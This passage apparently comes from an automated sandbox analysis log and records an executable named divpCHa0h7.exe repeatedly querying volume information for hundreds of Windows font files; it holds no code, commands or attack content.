          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
